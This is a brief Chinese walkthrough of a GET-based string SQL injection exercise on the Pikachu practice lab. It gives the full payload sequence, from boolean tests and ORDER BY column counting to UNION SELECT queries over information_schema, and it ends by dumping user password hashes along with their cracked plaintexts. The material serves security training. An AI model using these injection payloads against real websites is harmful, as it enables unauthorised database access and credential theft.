Pikachu--字符型注入（get）

Pikachu--字符型注入（get）

提交方式是get提交，直接在浏览器地址栏里输入注入语句得出结果

判断注入类型

我们要输入数据库里面有的名字 比如vince

输入1' and '1'='2  错误结果

输入 1' and '1'='1 正确结果         判断为字符型注入

判断字段数

输入vince' order by 1#   返回正确

输入vince' order by 2#  返回正确

输入 vince' order by 3#

所以字段数为2

判断显位

Vince' union select 1,2#

发现1和2的位置都可以正确回显，1，2地方使用联合注入。

查询当前数据库

1' union select 1,database() #   当前数据库  

获取表名

1' union select 1,group_concat(table_name)from(information_schema.tables) where table_schema='pikachu' #

获取列表

1' union select 1,group_concat(column_name) from (information_schema.columns) where table_name='users' #

获取数据

1' union select username,password from users#

your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

解密为：123456

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

解密为：000000

your uid:test
your email is: e99a18c428cb38d5f260853678922e03

解密为：abc123